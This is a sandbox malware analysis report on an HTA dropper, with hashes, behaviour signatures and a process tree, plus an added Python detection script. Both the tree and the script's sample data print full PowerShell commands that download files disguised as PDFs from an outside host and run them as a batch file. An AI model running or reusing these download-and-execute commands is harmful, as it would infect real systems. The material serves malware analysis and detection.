Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/03/2023, 09:14

General

  • Target

    doc(1).hta

  • Size

    863B

  • MD5

    2a876878eb744982978d6fc5228b6316

  • SHA1

    6d01b2eddc73cda76aa99222f8a300c3ee26719b

  • SHA256

    7d574958aa9f19ed8177ed91a0d9a1c0e222fa749046239aee7ff326880ea230

  • SHA512

    6f048014b5efaf1ad7a5c3a2242658854650bc251b80941c9ff9e1e8bf99bf4e04b2384476c741f769e5391e3de2b8d441a793fe0dc128ea84719354127ca5de

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). The sandbox attaches "likely ransomware behaviour" to this signature generically; the process tree below shows a download-and-execute chain, and no encryption activity is recorded in this report.

  • Modifies Internet Explorer settings (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (16 IoCs)

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\doc(1).hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf -OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\kim.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf -OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\kim.bat
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:552
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf -OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\Note.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:596
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf -OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\Note.txt
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1684
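As an added detection example (not part of the sandbox report), the following Python walks process-creation records shaped like the Processes tree above and flags the three features of this chain: a shell descending from mshta.exe, a PowerShell download cradle, and a fetched URL whose .pdf extension disagrees with the .bat/.txt -OutFile target. The records are constructed from the tree above; the explorer.exe parent of mshta.exe and the benign control entry are assumptions, and the field names pid/ppid/image/cmdline are mine, modelled on Sysmon Event ID 1.

```python
"""Flag the mshta -> cmd -> powershell download cradle seen in this report.

Added example, not the sandbox's own logic. Records are constructed to
mirror the Processes tree; the explorer.exe parent and the benign
powershell entry are assumptions added as context/control.
"""
import ntpath
import re
from dataclasses import dataclass, field

# `iwr`, `curl` and `wget` are built-in aliases of Invoke-WebRequest in
# Windows PowerShell 5.x, so they are matched alongside the cmdlet names.
CRADLE_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|curl|wget|Invoke-RestMethod|irm|"
    r"DownloadFile|DownloadString|Start-BitsTransfer)\b", re.I)
URI_RE = re.compile(r"-Uri\s+['\"]?([^\s'\";]+)", re.I)
OUTFILE_RE = re.compile(r"-OutFile\s+['\"]?([^\s'\";]+)", re.I)

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
EXEC_EXTS = {".bat", ".cmd", ".exe", ".ps1", ".vbs", ".js", ".hta", ".scr", ".dll"}

Z_CMD = (r"powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf "
         r"-OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 "
         r"C:\Users\Admin\AppData\Local\Temp\kim.bat")
B_CMD = (r"powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf "
         r"-OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 "
         r"C:\Users\Admin\AppData\Local\Temp\Note.txt")
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records (pid, ppid, image, cmdline), mirroring the tree.
EVENTS = [
    {"pid": 1500, "ppid": 4, "image": r"C:\Windows\explorer.exe",        # assumed parent
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 1268, "ppid": 1500, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\doc(1).hta"'},
    {"pid": 1388, "ppid": 1268, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ' + Z_CMD},
    {"pid": 552, "ppid": 1388, "image": PS, "cmdline": Z_CMD},
    {"pid": 596, "ppid": 1268, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ' + B_CMD},
    {"pid": 1684, "ppid": 596, "image": PS, "cmdline": B_CMD},
    {"pid": 2000, "ppid": 1500, "image": PS,                              # benign control
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list = field(default_factory=list)


def basename(path):
    return ntpath.basename(path).lower()


def ext_of(path_or_url):
    """Extension of the last path component; works for URLs and Windows paths."""
    name = re.split(r"[\\/]", path_or_url)[-1]
    return ntpath.splitext(name)[1].lower()


def ancestors(pid, by_pid, max_depth=4):
    """Image basenames of the parent, grandparent, ... up to max_depth."""
    chain, ev = [], by_pid.get(pid)
    while ev and len(chain) < max_depth:
        ev = by_pid.get(ev["ppid"])
        if ev:
            chain.append(basename(ev["image"]))
    return chain


def analyze(events):
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, reasons = basename(e["image"]), []
        if name in SHELLS:
            hosts = [a for a in ancestors(e["pid"], by_pid) if a in SCRIPT_HOSTS]
            if hosts:
                reasons.append(f"{name} descends from script host {hosts[0]}")
        m = CRADLE_RE.search(e["cmdline"])
        if m:
            reasons.append(f"download cradle: {m.group(1)}")
            uri, out = URI_RE.search(e["cmdline"]), OUTFILE_RE.search(e["cmdline"])
            if uri and out:
                u_ext, o_ext = ext_of(uri.group(1)), ext_of(out.group(1))
                if u_ext != o_ext:   # "pdf" on the wire, something else on disk
                    reasons.append(f"extension mismatch: fetched {u_ext or '(none)'} written as {o_ext}")
                if o_ext in EXEC_EXTS:
                    reasons.append(f"executable dropped to {out.group(1)}")
        if reasons:
            findings.append(Finding(e["pid"], name, reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f.pid, f.image, *f.reasons, sep="\n  ")
```

Both cmd.exe wrappers are flagged as well as the PowerShell children because the cradle text is visible in the `/c` argument; the benign explorer.exe-spawned PowerShell is not. The ancestry walk is what makes the rule robust to the extra cmd.exe hop: matching only on direct parent would miss powershell.exe here.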

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\51CWKEOKRQWB8LVY21R6.temp

    Filesize

    7KB

    MD5

    40372829434f5ac63cffbd304e62d67b

    SHA1

    789a0c4cc598f3c2290aaf1645346c1b1cea76ef

    SHA256

    981ca88268ac9f88cc3400b75c54522c88da86ce2cb840fb3fa1c871f05c6f68

    SHA512

    64d6dec7ad76d49b61ea9e90c28659554270afaefbdd025a413244527f200dd2cf807e988e8c068ee2b9c9b60683a6cc2466c45fd6afcfe7abe6eb1b71baf9bc

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    40372829434f5ac63cffbd304e62d67b

    SHA1

    789a0c4cc598f3c2290aaf1645346c1b1cea76ef

    SHA256

    981ca88268ac9f88cc3400b75c54522c88da86ce2cb840fb3fa1c871f05c6f68

    SHA512

    64d6dec7ad76d49b61ea9e90c28659554270afaefbdd025a413244527f200dd2cf807e988e8c068ee2b9c9b60683a6cc2466c45fd6afcfe7abe6eb1b71baf9bc

  • memory/552-56-0x00000000026E0000-0x0000000002720000-memory.dmp

    Filesize

    256KB

  • memory/552-57-0x00000000026E0000-0x0000000002720000-memory.dmp

    Filesize

    256KB

  • memory/1684-64-0x0000000002770000-0x00000000027B0000-memory.dmp

    Filesize

    256KB

  • memory/1684-63-0x0000000002770000-0x00000000027B0000-memory.dmp

    Filesize

    256KB